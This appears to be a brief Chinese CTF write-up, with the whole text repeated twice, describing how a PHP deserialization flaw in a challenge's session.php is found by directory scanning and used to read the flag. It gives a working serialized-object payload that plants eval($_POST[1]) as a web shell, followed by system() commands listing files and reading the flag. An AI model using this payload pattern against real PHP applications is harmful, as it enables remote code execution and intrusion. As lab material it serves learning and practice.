常见的几个地方都没有有用的信息
扫目录后
session.php 中有漏洞点
反序列化
简单的反序列化,跑出来直接传参
GET
/session.php?aa=O:4:%22Anti%22:1:{s:4:%22info%22;s:16:%22eval($_POST[1]);%22;}
POST
1=phpinfo();
成功
1=system('ls');
1=system('tac f1ag_i3_h3re');
常见的几个地方都没有有用的信息
扫目录后
session.php 中有漏洞点
反序列化
简单的反序列化,跑出来直接传参
GET
/session.php?aa=O:4:%22Anti%22:1:{s:4:%22info%22;s:16:%22eval($_POST[1]);%22;}
POST
1=phpinfo();
成功
1=system('ls');
1=system('tac f1ag_i3_h3re');